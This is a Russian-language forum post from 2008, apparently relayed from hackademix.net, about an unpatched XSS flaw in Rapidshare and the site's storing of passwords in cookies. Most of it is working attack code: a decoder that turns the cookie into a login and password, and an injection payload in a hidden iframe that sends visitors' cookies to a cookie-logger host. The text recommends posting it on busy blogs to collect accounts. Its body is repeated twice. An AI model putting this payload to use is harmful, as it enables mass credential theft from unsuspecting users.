Wh(te
15.07.2008, 18:08
Nktpro любезно сообщил о последней XSS уязвимости на Rapidshare которая до сих пор не закрыта, несмотря на то , что о ней была оповещена администрация файлообменника еще месяц назад пользователями сайта.
Но на что Вы можете расчитывать от людей, которые хранят логин и пароль в cookie?
Да , убедитесь сами: Rapidshare cookie имеют вид: user=12345-%36%37%38%39%30.
В Javascript,
cookie = "username=" + login + "-" + pwd.replace(/./g, function(s) "%" + (s.charCodeAt(0).toString(16)))
Поэтому этих cookie достаточно для получения доступа
var [login, pwd] = cookie.replace(/.*=/,'').split("-"), pwd = unescape(pwd);
Это значит следующее , если включить этот код в сообщение в блоге который посещается множеством пользователей rapidshare , можно получить огромное колличество аккаунтов.
var injection = "<script>(" + (function() {
new Image().src = "http://evil.hackademix.net/cookielogger/rapidshare/?c=" +
escape(document.cookie);
}) + ")()</scr" + "ipt>"
var iframe = document.body.appendChild(document.createElement("iframe"));
iframe.style.visibility = "hidden";
iframe.src = "http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22" +
encodeURIComponent(injection);
15\07\2008 ©http://hackademix.net/
Но на что Вы можете расчитывать от людей, которые хранят логин и пароль в cookie?
Да , убедитесь сами: Rapidshare cookie имеют вид: user=12345-%36%37%38%39%30.
В Javascript,
cookie = "username=" + login + "-" + pwd.replace(/./g, function(s) "%" + (s.charCodeAt(0).toString(16)))
Поэтому этих cookie достаточно для получения доступа
var [login, pwd] = cookie.replace(/.*=/,'').split("-"), pwd = unescape(pwd);
Это значит следующее , если включить этот код в сообщение в блоге который посещается множеством пользователей rapidshare , можно получить огромное колличество аккаунтов.
var injection = "<script>(" + (function() {
new Image().src = "http://evil.hackademix.net/cookielogger/rapidshare/?c=" +
escape(document.cookie);
}) + ")()</scr" + "ipt>"
var iframe = document.body.appendChild(document.createElement("iframe"));
iframe.style.visibility = "hidden";
iframe.src = "http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22" +
encodeURIComponent(injection);
15\07\2008 ©http://hackademix.net/